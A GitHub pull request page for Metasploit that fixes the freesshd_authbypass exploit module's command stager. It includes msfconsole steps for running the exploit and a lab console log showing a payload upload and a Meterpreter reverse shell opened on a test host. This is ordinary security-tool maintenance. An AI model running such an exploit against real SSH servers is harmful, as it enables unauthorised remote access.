Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Use the Msf::Exploit::CmdStager mixin. Fixes #8092. #8095

Merged
merged 3 commits into from Mar 12, 2017
Merged

Use the Msf::Exploit::CmdStager mixin. Fixes #8092. #8095

merged 3 commits into from Mar 12, 2017

Conversation

pbarry-r7
Copy link
Contributor

@pbarry-r7 pbarry-r7 commented Mar 11, 2017
edited by wvu

Update the freesshd_authbypass module so it can locate the vbs_b64 command stager.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • Get a session on an exploitable target.
  • use exploit/windows/ssh/freesshd_authbypass
  • Set RHOST, RPORT, USERNAME options accordingly.
  • run
  • Verify the exploit runs without throwing an Errno::ENOENT error.

@wvu wvu self-assigned this Mar 12, 2017
@wvu wvu mentioned this pull request Mar 12, 2017
Merged
@pbarry-r7
Merge pull request #1 from wvu-r7/pr/8095
bc9aa14 
Update freesshd_authbypass to use CmdStager fully
@pbarry-r7 pbarry-r7 force-pushed the bug/8092/freesshd_authbypass_vbs_fix branch from 690f23b to bc9aa14 Compare March 12, 2017 03:49
@wvu wvu mentioned this pull request Mar 12, 2017
Closed
@wvu
Copy link
Contributor

wvu commented Mar 12, 2017 

msf exploit(freesshd_authbypass) > run

[*] Started reverse TCP handler on 192.168.33.1:4444 
[*] 192.168.33.129:2222 - Trying username '[redacted]'
[*] 192.168.33.129:2222 - Uploading payload, this may take several minutes...
[*] 192.168.33.129:2222 - Command Stager progress -   1.66% done (1699/102108 bytes)
[snip]
[*] Sending stage (957487 bytes) to 192.168.33.129
[*] 192.168.33.129:2222 - Command Stager progress - 100.00% done (102108/102108 bytes)
[*] Meterpreter session 1 opened (192.168.33.1:4444 -> 192.168.33.129:33920) at 2017-03-11 22:09:52 -0600

meterpreter > getuid
Server username: ubuntu\[redacted]
meterpreter > sysinfo
Computer        : ubuntu
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x64
System Language : en_US
Domain          : ubuntu
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter >

Note: this is Wine.

wvu added a commit to wvu/metasploit-framework that referenced this pull request Mar 12, 2017
@wvu
Land rapid7#8095, CmdStager fix for freesshd_authbypass
8b7125e
@wvu wvu merged commit bc9aa14 into rapid7:master Mar 12, 2017
@wvu
Copy link
Contributor

wvu commented Mar 15, 2017
edited by tdoan-r7

Release Notes

The command stager in exploit/windows/ssh/freesshd_authbypass has been fixed so that it can find the VBS decoder that was moved to the rex-exploitation gem.

@tdoan-r7 tdoan-r7 added the rn-fix release notes fix label Mar 22, 2017
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@wvu wvu

Labels
bug module rn-fix release notes fix
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@pbarry-r7 @wvu @tdoan-r7